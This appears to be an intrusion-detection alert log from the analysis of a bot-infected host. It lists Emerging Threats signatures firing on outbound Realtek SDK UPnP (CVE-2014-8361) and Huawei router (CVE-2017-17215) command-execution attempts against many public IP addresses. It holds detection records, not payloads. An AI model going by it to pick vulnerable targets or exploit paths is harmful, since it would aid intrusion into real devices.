                                      07/20/24-23:01:01.805210TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615599852869192.168.2.2344.70.248.184
                                      07/20/24-23:01:43.474436TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4106652869192.168.2.23186.139.241.135
                                      07/20/24-23:01:08.599362TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5178852869192.168.2.23193.7.32.204
                                      07/20/24-23:01:27.651187TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4985037215192.168.2.23197.49.83.49
                                      07/20/24-23:01:44.991829TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3429852869192.168.2.2367.229.67.72
                                      07/20/24-23:01:03.958922TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616007652869192.168.2.23206.248.87.37
                                      07/20/24-23:01:42.641430TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613344852869192.168.2.2367.229.67.72
                                      07/20/24-23:01:13.604911TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614540652869192.168.2.2327.150.162.76
                                      07/20/24-23:01:42.129029TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614097852869192.168.2.23203.162.151.3
                                      07/20/24-23:01:40.279669TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5692837215192.168.2.23197.67.22.235
                                      07/20/24-23:01:24.934977TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3442637215192.168.2.23166.230.251.127
                                      07/20/24-23:01:00.645186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4226037215192.168.2.2341.112.123.1
                                      07/20/24-23:01:25.146493TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4584652869192.168.2.23152.43.74.118
                                      07/20/24-23:01:02.064358TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5360637215192.168.2.23197.5.169.228
                                      07/20/24-23:01:32.046652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4235437215192.168.2.23157.109.141.179
                                      07/20/24-23:01:41.960623TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615333452869192.168.2.23173.71.226.225
                                      07/20/24-23:01:27.749737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5290637215192.168.2.23218.132.145.180
                                      07/20/24-23:01:40.286738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3529237215192.168.2.2399.202.196.168
                                      07/20/24-23:01:04.014688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5896237215192.168.2.23197.34.158.231
                                      07/20/24-23:01:43.243465TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5727052869192.168.2.2361.42.34.219
                                      07/20/24-23:01:08.693187TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26075052869192.168.2.2370.148.71.209
                                      07/20/24-23:01:02.054387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4371237215192.168.2.23176.251.98.66
                                      07/20/24-23:01:43.938688TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614981252869192.168.2.234.66.151.191
                                      07/20/24-23:01:42.984532TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614068852869192.168.2.23124.13.0.132
                                      07/20/24-23:01:02.048214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5467037215192.168.2.2341.178.90.216
                                      07/20/24-23:01:55.572517TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24337852869192.168.2.2314.190.237.146
                                      07/20/24-23:01:31.325694TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4053652869192.168.2.2324.238.134.176
                                      07/20/24-23:01:44.038410TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25411452869192.168.2.23173.71.226.225
                                      07/20/24-23:00:57.221190TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4265037215192.168.2.2347.7.162.229
                                      07/20/24-23:01:27.677519TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3445237215192.168.2.23128.19.87.235
                                      07/20/24-23:01:41.419124TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613635852869192.168.2.23158.212.171.84
                                      07/20/24-23:01:24.886284TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5631637215192.168.2.23197.12.62.22
                                      07/20/24-23:01:00.633633TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3713837215192.168.2.23197.229.227.49
                                      07/20/24-23:01:11.662969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5107637215192.168.2.2341.217.4.188
                                      07/20/24-23:01:41.399866TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4410652869192.168.2.2349.9.206.193
                                      07/20/24-23:01:41.354321TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613617652869192.168.2.2354.250.222.170
                                      07/20/24-23:01:49.097048TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614460252869192.168.2.2323.185.211.99
                                      07/20/24-23:01:45.109958TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3609052869192.168.2.23174.213.208.19
                                      07/20/24-23:02:09.148759TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26041252869192.168.2.23189.55.165.96
                                      07/20/24-23:01:08.620788TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25701452869192.168.2.23164.236.243.93
                                      07/20/24-23:01:08.572790TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24915052869192.168.2.2313.18.63.141
                                      07/20/24-23:01:08.606848TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5366052869192.168.2.239.134.98.50
                                      07/20/24-23:01:08.585790TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23344652869192.168.2.23115.35.215.139
                                      07/20/24-23:01:41.991545TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614741252869192.168.2.23197.168.237.206
                                      07/20/24-23:01:42.718842TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23581652869192.168.2.23106.204.29.126
                                      07/20/24-23:01:49.794519TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5097052869192.168.2.23200.250.178.79
                                      07/20/24-23:01:41.909668TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23766052869192.168.2.23102.134.118.47
                                      07/20/24-23:00:57.221367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5245037215192.168.2.2341.214.240.131
                                      07/20/24-23:01:59.745622TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3805852869192.168.2.23119.78.161.123
                                      07/20/24-23:02:05.547419TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615526452869192.168.2.23182.119.21.176
                                      07/20/24-23:01:44.856714TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613487452869192.168.2.23109.170.40.38
                                      07/20/24-23:01:31.979752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4506037215192.168.2.2341.131.219.214
                                      07/20/24-23:01:43.023857TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4261052869192.168.2.23129.7.216.73
                                      07/20/24-23:01:47.307063TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614910652869192.168.2.2359.106.145.113
                                      07/20/24-23:01:04.160872TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4736052869192.168.2.2393.10.103.253
                                      07/20/24-23:01:58.755147TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5127852869192.168.2.23131.14.182.74
                                      07/20/24-23:01:25.969609TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614189652869192.168.2.23113.130.121.87
                                      07/20/24-23:01:02.079114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4568037215192.168.2.23111.15.64.29
                                      07/20/24-23:01:47.092270TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5462052869192.168.2.2341.203.104.16
                                      07/20/24-23:01:52.701293TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5894052869192.168.2.23188.52.23.162
                                      07/20/24-23:00:59.203960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4661837215192.168.2.23118.76.56.217
                                      07/20/24-23:01:08.693187TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24112252869192.168.2.23159.70.111.204
                                      07/20/24-23:01:03.953624TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5243252869192.168.2.23150.181.42.248
                                      07/20/24-23:01:31.978141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4147837215192.168.2.23197.253.132.236
                                      07/20/24-23:01:02.293628TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3564652869192.168.2.2348.69.126.229
                                      07/20/24-23:01:54.980256TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4580652869192.168.2.2396.1.75.175
                                      07/20/24-23:01:00.640312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5407037215192.168.2.23197.77.47.158
                                      07/20/24-23:01:41.305474TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5808652869192.168.2.2320.44.163.254
                                      07/20/24-23:01:04.058922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3855837215192.168.2.2341.21.126.116
                                      07/20/24-23:01:04.098909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4914237215192.168.2.23157.69.249.104
                                      07/20/24-23:01:50.223705TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25033452869192.168.2.2336.88.70.103
                                      07/20/24-23:01:12.806839TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25320452869192.168.2.23195.196.57.80
                                      07/20/24-23:01:13.820007TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613711452869192.168.2.23105.36.101.44
                                      07/20/24-23:01:07.062666TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3685637215192.168.2.23197.191.219.145
                                      07/20/24-23:01:14.095462TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4108237215192.168.2.23157.9.117.101
                                      07/20/24-23:01:26.115620TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615119052869192.168.2.2360.163.17.129
                                      07/20/24-23:01:47.385543TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613337252869192.168.2.23196.46.94.209
                                      07/20/24-23:01:51.835178TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23804252869192.168.2.2364.111.30.226
                                      07/20/24-23:01:07.033766TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4006037215192.168.2.23197.158.235.29
                                      07/20/24-23:01:03.266392TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615140052869192.168.2.239.134.98.50
                                      07/20/24-23:01:21.951298TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5504637215192.168.2.23157.139.97.65
                                      07/20/24-23:01:44.963815TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614294252869192.168.2.2353.50.156.29
                                      07/20/24-23:01:42.702732TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24459252869192.168.2.23128.83.244.58
                                      07/20/24-23:01:44.921789TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25239652869192.168.2.2390.64.10.170
                                      07/20/24-23:01:47.236261TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5708052869192.168.2.23163.119.42.207
                                      07/20/24-23:01:31.975158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4760037215192.168.2.23157.158.210.182
                                      07/20/24-23:01:43.671215TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24219452869192.168.2.23187.139.238.2
                                      07/20/24-23:01:42.685722TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25013652869192.168.2.23143.235.222.68
                                      07/20/24-23:01:11.636599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3870437215192.168.2.23197.174.117.103
                                      07/20/24-23:01:14.296756TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4334837215192.168.2.2341.215.255.246
                                      07/20/24-23:01:49.721561TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23927252869192.168.2.23208.98.159.35
                                      07/20/24-23:01:06.988055TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3496437215192.168.2.23197.33.180.41
                                      07/20/24-23:01:43.415157TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5436052869192.168.2.2317.78.214.126
                                      07/20/24-23:01:42.111275TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25282652869192.168.2.2394.159.177.21
                                      07/20/24-23:01:45.048479TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3611652869192.168.2.23147.236.68.25
                                      07/20/24-23:01:08.611391TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23498252869192.168.2.23178.251.54.152
                                      07/20/24-23:01:43.957856TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613988652869192.168.2.235.36.69.33
                                      07/20/24-23:01:41.476492TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3717252869192.168.2.23132.116.164.169
                                      07/20/24-23:01:42.685722TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3805652869192.168.2.2364.123.182.34
                                      07/20/24-23:01:02.437937TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613928052869192.168.2.2397.69.175.230
                                      07/20/24-23:01:50.083569TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5486452869192.168.2.23112.255.30.88
                                      07/20/24-23:01:44.470424TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23852652869192.168.2.2398.171.161.225
                                      07/20/24-23:01:45.485100TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23925852869192.168.2.23203.196.31.139
                                      07/20/24-23:01:47.375803TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615228252869192.168.2.23175.210.141.95
                                      07/20/24-23:01:56.667752TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3311852869192.168.2.23141.3.146.221
                                      07/20/24-23:01:42.422050TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5753452869192.168.2.2376.231.40.42
                                      07/20/24-23:01:42.703494TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3898852869192.168.2.2385.239.208.54
                                      07/20/24-23:01:42.164492TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614544252869192.168.2.23106.2.127.68
                                      07/20/24-23:01:54.796749TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3346252869192.168.2.2343.18.71.244
                                      07/20/24-23:01:00.635367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5689037215192.168.2.23197.10.234.194
                                      07/20/24-23:01:59.513085TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5333452869192.168.2.2389.86.75.249
                                      07/20/24-23:01:24.885849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3786037215192.168.2.2341.231.145.68
                                      07/20/24-23:01:12.806645TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24190252869192.168.2.23185.44.122.49
                                      07/20/24-23:01:57.465464TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4199452869192.168.2.2388.40.199.176
                                      07/20/24-23:01:11.634077TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5798837215192.168.2.23157.55.166.124
                                      07/20/24-23:01:51.172994TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4944452869192.168.2.2319.90.99.238
                                      07/20/24-23:01:57.747300TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5846452869192.168.2.23171.245.11.17
                                      07/20/24-23:00:57.221888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4760437215192.168.2.23197.178.33.225
                                      07/20/24-23:01:43.405280TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5100852869192.168.2.23205.136.89.238
                                      07/20/24-23:01:02.493447TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3627852869192.168.2.23112.103.96.49
                                      07/20/24-23:01:51.833558TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23597452869192.168.2.23207.100.140.133
                                      07/20/24-23:01:52.883801TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4726252869192.168.2.23122.138.157.236
                                      07/20/24-23:01:47.669469TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4669452869192.168.2.2360.33.175.153
                                      07/20/24-23:01:11.642449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5952837215192.168.2.23157.66.219.47
                                      07/20/24-23:01:00.634089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3871437215192.168.2.2341.99.7.194
                                      07/20/24-23:01:47.641942TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24634452869192.168.2.23106.236.204.67
                                      07/20/24-23:01:44.749294TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5586852869192.168.2.23169.186.230.20
                                      07/20/24-23:01:01.765841TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3401652869192.168.2.2325.68.235.59
                                      07/20/24-23:01:53.415663TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4298852869192.168.2.23197.114.179.188
                                      07/20/24-23:01:24.876750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5798037215192.168.2.2390.31.237.217
                                      07/20/24-23:00:59.187842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3389437215192.168.2.2341.132.20.65
                                      07/20/24-23:02:17.085116TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4807252869192.168.2.2357.122.183.186
                                      07/20/24-23:01:44.358680TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24021252869192.168.2.23178.91.194.150
                                      07/20/24-23:01:41.299284TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5512252869192.168.2.23174.30.181.131
                                      07/20/24-23:01:42.287237TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3328852869192.168.2.23137.75.123.123
                                      07/20/24-23:01:44.648889TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615641852869192.168.2.2390.237.72.71
                                      07/20/24-23:01:40.355589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3932037215192.168.2.23130.2.207.228
                                      07/20/24-23:01:42.945747TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614847652869192.168.2.23154.167.112.208
                                      07/20/24-23:01:00.634089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5695637215192.168.2.2389.73.227.199
                                      07/20/24-23:01:24.898476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3455237215192.168.2.2341.52.85.114
                                      07/20/24-23:01:46.020177TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25656052869192.168.2.23151.149.108.97
                                      07/20/24-23:01:08.555687TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24253052869192.168.2.2347.237.197.200
                                      07/20/24-23:01:44.007374TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3994252869192.168.2.23178.91.194.150
                                      07/20/24-23:01:04.773524TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3900852869192.168.2.23159.70.111.204
                                      07/20/24-23:01:09.027075TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24480652869192.168.2.23157.202.7.129
                                      07/20/24-23:01:44.038410TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4532052869192.168.2.2378.42.251.42
                                      07/20/24-23:00:59.148145TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5578437215192.168.2.23197.64.180.236
                                      07/20/24-23:01:52.343511TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614958452869192.168.2.23131.14.182.74
                                      07/20/24-23:01:41.508271TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4951852869192.168.2.23143.235.222.68
                                      07/20/24-23:01:44.590674TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24658452869192.168.2.23150.244.130.144
                                      07/20/24-23:01:48.124037TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613908652869192.168.2.23173.124.142.19
                                      07/20/24-23:01:45.098864TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24226652869192.168.2.23197.132.250.53
                                      07/20/24-23:01:27.651332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5547037215192.168.2.2341.190.44.53
                                      07/20/24-23:01:43.044693TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4163852869192.168.2.23129.7.216.73
                                      07/20/24-23:01:34.050672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3795237215192.168.2.23197.22.197.144
                                      07/20/24-23:01:24.877747TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3913237215192.168.2.23157.65.10.54
                                      07/20/24-23:01:10.600298TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613978052869192.168.2.23119.4.44.94
                                      07/20/24-23:01:02.046626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3625637215192.168.2.239.120.239.102
                                      07/20/24-23:01:43.944379TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5467052869192.168.2.2335.7.41.237
                                      07/20/24-23:01:08.590937TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5838452869192.168.2.2362.90.39.173
                                      07/20/24-23:01:41.987411TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4304252869192.168.2.23107.189.251.198
                                      07/20/24-23:02:07.969418TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614664852869192.168.2.2394.27.30.164
                                      07/20/24-23:01:46.212590TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3688652869192.168.2.23196.21.217.254
                                      07/20/24-23:01:45.010540TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5346252869192.168.2.23192.54.139.100
                                      07/20/24-23:01:43.324295TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615376452869192.168.2.2335.7.41.237
                                      07/20/24-23:01:04.742666TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6085852869192.168.2.2386.219.42.227
                                      07/20/24-23:01:12.807102TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25464852869192.168.2.2357.137.225.59
                                      07/20/24-23:01:46.292331TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5100252869192.168.2.2392.210.119.212
                                      07/20/24-23:01:12.806839TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5425852869192.168.2.23167.63.84.166
                                      07/20/24-23:01:08.613165TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5283052869192.168.2.23114.20.70.247
                                      07/20/24-23:01:54.246583TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614498852869192.168.2.23160.206.110.41
                                      07/20/24-23:01:54.957644TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25140452869192.168.2.23209.219.111.180
                                      07/20/24-23:01:59.855159TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615042452869192.168.2.2395.252.31.72
                                      07/20/24-23:01:41.380561TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614479852869192.168.2.23184.103.85.217
                                      07/20/24-23:01:42.313122TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24848452869192.168.2.2398.9.1.207
                                      07/20/24-23:01:21.909111TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5432037215192.168.2.23197.36.30.205
                                      07/20/24-23:01:07.004906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4697437215192.168.2.23157.246.47.96
                                      07/20/24-23:01:51.790169TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23290452869192.168.2.23115.59.47.171
